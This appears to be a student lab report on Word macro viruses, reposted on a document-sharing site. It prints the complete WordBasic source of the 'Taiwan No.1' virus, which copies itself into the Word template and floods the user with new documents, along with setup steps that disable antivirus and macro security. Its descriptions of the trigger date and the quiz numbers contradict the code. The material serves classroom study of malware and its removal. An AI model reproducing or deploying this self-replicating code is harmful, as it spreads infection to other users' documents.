计算机病毒原理台湾1号病毒实验报告.docx
- 文档编号:5832926
- 上传时间:2023-01-01
- 格式:DOCX
- 页数:12
- 大小:568.36KB
计算机病毒原理台湾1号病毒实验报告.docx
《计算机病毒原理台湾1号病毒实验报告.docx》由会员分享,可在线阅读,更多相关《计算机病毒原理台湾1号病毒实验报告.docx(12页珍藏版)》请在冰豆网上搜索。
计算机病毒原理台湾1号病毒实验报告
计算机病毒
实验报告
姓名:
学号:
老师:
日期:
一.实验目的
台湾1号病毒是一种破坏力较大的宏病毒!
Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。
本实验演示了宏的编写,通过台湾1号病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。
二.实验内容
1.macrovirus中的内容
2.计算机病毒篇---->计算机宏病毒
三.实验环境
1.macrovirus
硬件设备:
局域网,终端PC机。
系统软件:
Windows系列操作系统
支撑软件:
Word2003
软件设置:
关闭杀毒软;打开Word2003,在工具宏安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visualbasic项目的访问.
实验环境配置如下图所示:
2.计算机宏病毒
硬件设备:
部署WIN2003系统的PC机一台
软件工具:
Officeword2007
四.实验步骤及截图
台湾1号病毒代码
TaiwanNo.1病毒原始码
DimSharednm(4)
SubMAIN
DisableInput1
IfDay(Now())=13Then
try:
OnErrorGoto0
OnErrorGototry
test=-1
con=1
tog$=""
i=0
Whiletest=-1
Fori=0To4
nm(i)=Int(Rnd()*10000)
con=(con*nm(i))
Ifi=4Then
tog$=tog$+Str$(nm(4))+"=?
"
Gotobeg
EndIf
tog$=tog$+Str$(nm(i))+"*"
Nexti
rem随机选出四个千位数,以便等一下的游戏
beg:
Beep
rem电脑发出"哔"一声
ans$=InputBox$("今天是"+Date$()+",跟你玩一个心算游戏"
+Chr$(13)+/
"若你答错,只好接受震撼教育.............."+Chr$(13)+/
tog$,"台湾NO.1MacroVirus")
rem开个对话盒,以便输入解答用
IfRTrim$(LTrim$(ans$))=LTrim$(Str$(con))Then
MsgBox"恭贺你答对了,按确定就告诉你想知道的....",/
"台湾NO.1MacroVirus"
FileNewDefault
CenterPara
FormatFont.Font="细明体",.Points=16,.Bold=1,.Underline=1
Beep
Insert"何谓巨集病毒?
"
InsertPara
Beep
Insert"答案:
"
Italic1
Insert"我就是....."
InsertPara
InsertPara
Italic0
FormatFont.Font="细明体",.Points=16,.Bold=1,.Underline=1
Beep
Insert"如何预防巨集病毒?
"
InsertPara
Beep
Insert"答案:
"
Italic1
Insert"不要看我....."
Gotoexit
Else
Forj=1To20
Beep
FileNewDefault
Nextj
CenterPara
FormatFont.Font="细明体",.Points=16,.Bold=1,.Underline=1
Insert"巨集病毒"
Gototry
EndIf
Wend
EndIf
nor=CountMacros(0)
Ifnor>0Then
Forkk=1Tonor
IfMacroName$(kk,0)="AutoOpen"Thent=1
EndIf
Nextkk
EndIf
file$=FileName$()
filem$=file$+":
AutoOpen"
Ift<>1Then
MacroCopyfilem$,"AutoOpen"
MacroCopyfilem$,"AutoNew"
MacroCopyfilem$,"AutoClose"
EndIf
nor1=CountMacros
(1)
Ifnor1>0Then
Forkkk=1Tonor1
IfMacroName$(kkk,1)="AutoOpen"Thentt=1
EndIf
Nextkkk
EndIf
Iftt<>1Then
FileSaveAs.Format=1
MacroCopy"AutoOpen",filem$
EndIf
exit:
EndSub
该病毒的效果如下:
当打开被感染的word文档时,首先进行自我复制,感染word模板,然后检查日期,看是否是1日(即在每月的1日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于10的数相乘,如果作者的计算正确,那么就会新建一个文档,跳出如下字幕:
何谓宏病毒
答案:
我就是......
将系统日期设为XX月1号
如果答错,就会不停地刷屏,然后继续让你答题,否则跳出如下界面:
计算机宏病毒
1).新建Word文档并打开
2).调出开发工具,设置宏的等级,启用宏
3).创建宏,命名AutoExec编辑
4).编辑宏,语法上注意VBA版本保存
5).关闭所有Word(必须)
6).再次打开Word文档,宏病毒爆发,弹出刚刚编写的msgbox窗口
7).启动任务管理器结束进程
搜索winword.exe文件,并确定复制其位置
8).启用CMD,定位winword位置:
输入命令,用参数来打开安全模式winword.exe/a(执行此命令2次)
第一次安全模式
第二次新建文档
进行宏的打开设置来禁用宏
9).搜索normal.dotm等模板文件,若搜索不出东西,在高级选项中选中搜索隐藏文件及系统文件即可,并删除那个文件夹下的所有模板
10).简易摆脱宏完成,重新打开word,没有被感染。
五.总结与心得
在使用电脑的过程中,我们要加强电脑的安全指数,要有防范意识,防止网络病毒的入侵!
特别是在现代网络发达的社会,一旦被高级病毒入侵,很有可能带来重大损失!
同时也应该学好病毒知识,这样,我们就可以知道如何去解决病毒问题,让我们免受损失!
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 计算机病毒 原理 台湾 病毒 实验 报告